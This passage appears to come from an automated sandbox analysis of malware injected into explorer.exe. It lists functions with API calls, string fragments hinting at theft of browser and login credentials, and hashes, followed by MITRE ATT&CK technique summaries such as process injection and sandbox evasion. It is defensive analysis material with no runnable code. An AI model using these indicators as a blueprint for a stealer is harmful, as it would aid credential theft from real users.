Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction Fuzzy Hash: 4E414A70918A088FDB94EFA8C8D47AD7BF0FB98300F44466AD84ADB255DA349945CB85

Function 0E38DB72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 0E38DCCA

Strings

.dll, xrefs: 0E38DBCD
el32, xrefs: 0E38DBA0
kern, xrefs: 0E38DB99

Memory Dump Source

Source File: 00000009.00000002.4589368880.000000000E330000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e330000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction ID: d5219abf4c67c27f7b118e7b1bb1df793d8c418f665eb32cf93422a9d4304125
Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction Fuzzy Hash: 90413C70918A088FDF84EFA8C8957AD7BF0FF98300F44456AD84EDB255DE309945CB85

Function 0E39372E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 0E393791

Strings

ect, xrefs: 0E393761
conn, xrefs: 0E39375A

Memory Dump Source

Source File: 00000009.00000002.4589368880.000000000E330000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e330000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction ID: 3ac53300e44e244b1ffe3c94662252c4b2ae5042f4f91f44d28b92fe1887ec7e
Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction Fuzzy Hash: 46010C70618B188FCB94EF5CE088B55BBE0EB59314F1545AED90DCB266C774DD818BC2

Function 0E393732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 0E393791

Strings

ect, xrefs: 0E393761
conn, xrefs: 0E39375A

Memory Dump Source

Source File: 00000009.00000002.4589368880.000000000E330000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e330000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction ID: 52077f41f4155f6da87a308cbe11f6c36f9deff84b0b56cbe421d4b78d63b06a
Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction Fuzzy Hash: 8A011A70618A1C8FCB84EF5CA088B55BBE0EB59314F1545AEA80DCB226CB74CD818BC2

Function 0E3936B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32 ref: 0E393713

Strings

send, xrefs: 0E3936DA

Memory Dump Source

Source File: 00000009.00000002.4589368880.000000000E330000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e330000_explorer.jbxd

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction ID: 43d9bdcc11e804ed12e6f75d9b4ce8d4bf1ebdce121bc61c1b1ad4affb3f256c
Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction Fuzzy Hash: FD011270518A188FDB84EF1CD049B257BE0EB58314F1545AED85DCB266C670D8818B81

Function 0E3935B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32 ref: 0E393611

Strings

sock, xrefs: 0E3935D9

Memory Dump Source

Source File: 00000009.00000002.4589368880.000000000E330000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e330000_explorer.jbxd

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction ID: ba28af6fbe804105f42be584efec7d9070fb724af48ea1139dff7c033dc3280c
Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction Fuzzy Hash: 3B012C70618A188FCB84EF1CE049B54BBE0FB59314F1545AEE85ECB266C7B0C9818B86

Function 0E38B2DD Relevance: 1.6, APIs: 1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 0E38B32D

Memory Dump Source

Source File: 00000009.00000002.4589368880.000000000E330000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e330000_explorer.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction ID: cac4790e481adb676c47ba99b49824061186cd83f43bb0e237e4daa06803eb46
Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction Fuzzy Hash: 6B317E78614B0ADFDB64EF2981482A5FBA0FB64301F44467EC92DCB206C7B49850CF91

Function 0E38B412 Relevance: 1.5, APIs: 1, Instructions: 46
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32 ref: 0E38B461

Memory Dump Source

Source File: 00000009.00000002.4589368880.000000000E330000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e330000_explorer.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction ID: d850f0dcfc2360d7b7fac1239984f3690b09f5af56b779db0206bd44ddc8b0d8
Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction Fuzzy Hash: 11F0C230268A494FDB88EB2CD44562AF7D0FBE9214F444A3EA54DC3264DA69C9828716

Non-executed Functions

Function 10635622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON

Download Yara Rule

Strings

p, xrefs: 10635690
d, xrefs: 106356A5
s, xrefs: 10635689
c, xrefs: 10635697
n, xrefs: 106356C1
t, xrefs: 106356C8
e, xrefs: 1063566D
l, xrefs: 10635682
w, xrefs: 106356B3
2, xrefs: 10635674
i, xrefs: 1063569E
l, xrefs: 106356D6
d, xrefs: 106356CF
d, xrefs: 1063567B
n, xrefs: 106356BA
u, xrefs: 10635661
l, xrefs: 106356AC

Memory Dump Source

Source File: 00000009.00000002.4590810831.00000000105A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 105A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_105a0000_explorer.jbxd

Similarity

API ID:
String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
API String ID: 0-1539916866
Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction ID: b8dbaf3a7d7d4fd41a1cf465e953341be5020892bb82c1b135f1cdb029869028
Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction Fuzzy Hash: B341B170A18B08CFDB54DF88A4466BE7BF2FB48701F00025EE449DB245DBB5AD458BD6

Function 1063CAB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON

Download Yara Rule

Strings

l, xrefs: 1063CC35
n, xrefs: 1063CC98
[, xrefs: 1063CC90
], xrefs: 1063CC3D
c, xrefs: 1063CC0B
], xrefs: 1063CCA8
[, xrefs: 1063CC66
D, xrefs: 1063CCDA
e, xrefs: 1063CCA0
l, xrefs: 1063CCE2
[, xrefs: 1063CCCD
[, xrefs: 1063CBF6
b, xrefs: 1063CC73
[, xrefs: 1063CC2D

Memory Dump Source

Source File: 00000009.00000002.4590810831.00000000105A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 105A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_105a0000_explorer.jbxd

Similarity

API ID:
String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
API String ID: 0-355182820
Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction ID: c548d3ad8485ba19e9fcc7248328754e32d403e9ab305aa1c686bcb72a7922dd
Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction Fuzzy Hash: 70C15A74618B099FC798EF24D4866DAF3E5FB94305F40462AA49ECB250DF30A615CBCA

Function 106362F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

sspi, xrefs: 10636320
opera_browser.dll, xrefs: 10636629
l, xrefs: 106364E2
dragon_s.dll, xrefs: 10636614
cli., xrefs: 10636327
dll, xrefs: 1063632E
nspr, xrefs: 106364D4
4.dl, xrefs: 106364DB

Memory Dump Source

Source File: 00000009.00000002.4590810831.00000000105A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 105A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_105a0000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction ID: eebaafb177f73b9d35b4147c6c128896feda23e2546a03e187a934d25e714978
Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction Fuzzy Hash: 34C1A074619A194FC788EF28D456AEAB3E0FB98301F50432DA44ECB255DF30AA05CBC9

Function 106362F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

sspi, xrefs: 10636320
opera_browser.dll, xrefs: 10636629
l, xrefs: 106364E2
dragon_s.dll, xrefs: 10636614
cli., xrefs: 10636327
dll, xrefs: 1063632E
nspr, xrefs: 106364D4
4.dl, xrefs: 106364DB

Memory Dump Source

Source File: 00000009.00000002.4590810831.00000000105A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 105A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_105a0000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction ID: 28d13e76c22869a97c589d02ec8c50459ccd1941c210409a498c6168212327e4
Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction Fuzzy Hash: 90C1AF74619A194FC788EF28D456AEAB3E1FB98301F51432DA44ECB255DF30AA05CBC9

Function 10637CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON

Download Yara Rule

Strings

User, xrefs: 10637DAB
L: , xrefs: 10637D66
2, xrefs: 10637DE1
UR, xrefs: 10637D5F
Pass, xrefs: 10637D97
name, xrefs: 10637DB2
word, xrefs: 10637D9E

Memory Dump Source

Source File: 00000009.00000002.4590810831.00000000105A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 105A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_105a0000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction ID: 12082150e4a8f81e59757363a7f81f862cf8542ac7f9e08bf5df44ee6a956aae
Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction Fuzzy Hash: 12A1BD706187488FDB58DFA89444BEEB7E1FF98301F00462DE48EDB242EF7499458789

Function 10637CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON

Download Yara Rule

Strings

User, xrefs: 10637DAB
L: , xrefs: 10637D66
2, xrefs: 10637DE1
UR, xrefs: 10637D5F
Pass, xrefs: 10637D97
name, xrefs: 10637DB2
word, xrefs: 10637D9E

Memory Dump Source

Source File: 00000009.00000002.4590810831.00000000105A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 105A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_105a0000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction ID: 54ef7f6dd6c418fffb6d687e32557229dea645a860ca31902b4e2c508f77b7bd
Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction Fuzzy Hash: 92919D706187488FDB58DFA8D444BEEB7E1FB98301F00462EE48EDB242EF7495458789

Function 10632C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON

Download Yara Rule

Strings

ole3, xrefs: 10632C5D
dll, xrefs: 10632C9E
shel, xrefs: 10632C90
2.dl, xrefs: 10632C64
l32., xrefs: 10632C97

Memory Dump Source

Source File: 00000009.00000002.4590810831.00000000105A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 105A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_105a0000_explorer.jbxd

Similarity

API ID:
String ID: 2.dl$dll$l32.$ole3$shel
API String ID: 0-1970020201
Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction ID: 9841a9b1d934b37eb19a0b77d036e633e4a0438f09382fb6113b401af4b706d5
Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction Fuzzy Hash: 9F515EB0914B4C8FDB94DF64C0456EEB7F1FF58301F40462EA49AEB254EF30A5418B89

Function 1063386F Relevance: 6.4, Strings: 5, Instructions: 157COMMON

Download Yara Rule

Strings

ion., xrefs: 106338EC
\, xrefs: 106339E0
4, xrefs: 106339E9
vers, xrefs: 106338E4
dll, xrefs: 106338F4

Memory Dump Source

Source File: 00000009.00000002.4590810831.00000000105A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 105A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_105a0000_explorer.jbxd

Similarity

API ID:
String ID: 4$\$dll$ion.$vers
API String ID: 0-1610437797
Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction ID: bccc1373561276ab2b4e7343cbd5075aef8e5d3ab164b8d4da089aa76931315b
Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction Fuzzy Hash: B8417234619B4C8FCBA5EF2498457EAB3E4FB98302F51462E989ECB240EF30D54587C6

Function 106354B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON

Download Yara Rule

Strings

user, xrefs: 106354D3
cli., xrefs: 10635515
32.d, xrefs: 106354DA
dll, xrefs: 1063551C
sspi, xrefs: 1063550E

Memory Dump Source

Source File: 00000009.00000002.4590810831.00000000105A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 105A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_105a0000_explorer.jbxd

Similarity

API ID:
String ID: 32.d$cli.$dll$sspi$user
API String ID: 0-327345718
Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction ID: b6d069c962e74eb688c8e2583404eb5c06937eaf3bf4085898e818f5354ccb8c
Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction Fuzzy Hash: A7416D30A19E0DCFCB94EF68C0957ED77E2FB58352F51456AA80EDB250DA70E9408BC6

Function 10633432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

.dll, xrefs: 1063353F
h, xrefs: 1063351F
kern, xrefs: 1063352A
el32, xrefs: 10633537

Memory Dump Source

Source File: 00000009.00000002.4590810831.00000000105A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 105A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_105a0000_explorer.jbxd

Similarity

API ID:
String ID: .dll$el32$h$kern
API String ID: 0-4264704552
Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction ID: 44d7cb22f841262ff4c5a672b2cbe01623d2f84610bb0676174be4e50750d1fd
Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction Fuzzy Hash: 23419370608B494FD799DF2884853AAF7E1FF98302F104A2E949ECB255DB70D945CB85

Function 1063A0B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON

Download Yara Rule

Strings

, xrefs: 1063A184
f fr, xrefs: 1063A13D
Snif, xrefs: 1063A154
om:, xrefs: 1063A146

Memory Dump Source

Source File: 00000009.00000002.4590810831.00000000105A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 105A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_105a0000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction ID: 787ce5bf1a14bde2ebc402fc9168022ea5ab6d9c2486fe9f318ecdaca9692024
Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction Fuzzy Hash: 4731043450DB885FC75ADB28C4856DAB7D0FB84300F50491EE49FCB292EE34A649CB87

Function 1063A0C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

, xrefs: 1063A184
f fr, xrefs: 1063A13D
Snif, xrefs: 1063A154
om:, xrefs: 1063A146

Memory Dump Source

Source File: 00000009.00000002.4590810831.00000000105A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 105A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_105a0000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction ID: bc6ea8c3befa0a928e48915d2eea6e72071ba23a450ba3e6c0df0468b779f757
Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction Fuzzy Hash: B1310134409B486FC799DB28C4856EAB7D0FB94300F40491EE49FCB281EE30E646CB87

Function 106388C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

User-Agent: , xrefs: 10638935, 10638948
on.d, xrefs: 10638902
urlmon.dll, xrefs: 10638959
nt: , xrefs: 1063891E

Memory Dump Source

Source File: 00000009.00000002.4590810831.00000000105A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 105A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_105a0000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: 9c88cf0113b47b8538b1f0e36182f795909990b19ff618e2bfa79126d73259ee
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: B131CE31614A0D8FCB45EFA8C8857EEB7E0FF58205F40022AE45EDB240DF78964587D9

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

